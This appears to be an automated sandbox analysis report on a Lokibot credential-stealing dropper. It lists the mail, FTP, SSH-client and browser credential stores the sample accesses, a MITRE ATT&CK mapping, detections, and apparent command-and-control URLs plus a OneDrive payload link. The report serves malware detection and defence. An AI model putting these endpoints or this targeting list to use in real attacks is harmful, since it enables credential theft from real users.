                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Lokibot
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                PowerShell                		1
                DLL Side-Loading                		211
                Process Injection                		1
                Masquerading                		2
                OS Credential Dumping                		1
                Security Software Discovery                		Remote Services1
                Email Collection                		Exfiltration Over Other Network Medium1
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                Credentials in Registry                		1
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		Exfiltration Over Bluetooth2
                Non-Application Layer Protocol                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                Virtualization/Sandbox Evasion                		Security Account Manager21
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares2
                Data from Local System                		Automated Exfiltration112
                Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)211
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Remote System Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Obfuscated Files or Information                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Software Packing                		DCSync13
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756117 Sample: SecuriteInfo.com.Win32.Drop... Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 29 sedesadre.gq 2->29 39 Snort IDS alert for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 45 6 other signatures 2->45 8 SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe 15 4 2->8         started        signatures3 process4 dnsIp5 31 192.168.2.1 unknown unknown 8->31 33 onedrive.live.com 8->33 35 3 other IPs or domains 8->35 27 SecuriteInfo.com.W....15139.3101.exe.log, ASCII 8->27 dropped 47 Encrypted powershell cmdline option found 8->47 49 Writes to foreign memory regions 8->49 51 Injects a PE file into a foreign processes 8->51 13 RegAsm.exe 54 8->13         started        17 powershell.exe 16 8->17         started        19 powershell.exe 12 8->19         started        21 svchost.exe 8->21         started        file6 signatures7 process8 dnsIp9 37 sedesadre.gq 141.98.6.102, 49716, 49717, 49718 CMCSUS Germany 13->37 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->53 55 Tries to steal Mail credentials (via file / registry access) 13->55 57 Tries to harvest and steal ftp login credentials 13->57 59 Tries to harvest and steal browser information (history, passwords, etc) 13->59 23 conhost.exe 17->23         started        25 conhost.exe 19->25         started        signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe15%ReversingLabsByteCode-MSIL.Trojan.Bsymem
                SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe100%AviraHEUR/AGEN.1202504
                SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                14.0.RegAsm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.ibsensoftware.com/0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://james.newtonking.com/projects/json0%URL Reputationsafe
                https://dynamic.t0%URL Reputationsafe
                https://edi4gw.db.files.1drv.com40%Avira URL Cloudsafe
                http://sedesadre.gq/PKZ/PWS/fre.php0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                l-0003.l-dc-msedge.net
                		13.107.43.12
                		truefalse
                  		unknown
                  sedesadre.gq
                  		141.98.6.102
                  		truetrue
                    		unknown
                    onedrive.live.com
                    		unknown
                    		unknownfalse
                      		high
                      edi4gw.db.files.1drv.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://sedesadre.gq/PKZ/PWS/fre.phptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://kbfvzoboss.bid/alien/fre.phptrue
                        • URL Reputation: safe
                        		unknown
                        http://alphastand.top/alien/fre.phptrue
                        • URL Reputation: safe
                        		unknown
                        http://alphastand.win/alien/fre.phptrue
                        • URL Reputation: safe
                        		unknown
                        http://alphastand.trade/alien/fre.phptrue
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://edi4gw.db.files.1drv.com4SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519404605.00000000030D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.ibsensoftware.com/SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024%21128&authkey=AFWFoMkSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exefalse
                                      		high
                                      https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.401922859.0000000004961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.bingmapsportal.comsvchost.exe, 00000005.00000002.320847106.0000014604A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000002.321224479.0000014604A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://onedrive.live.comSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://go.micropowershell.exe, 00000001.00000002.420135572.00000000051CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.320944817.0000014604A27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://james.newtonking.com/projects/jsonSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521644432.000000000327E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519732360.0000000003147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://dynamic.tsvchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.newtonsoft.com/jsonschemaSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321064418.0000014604A3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
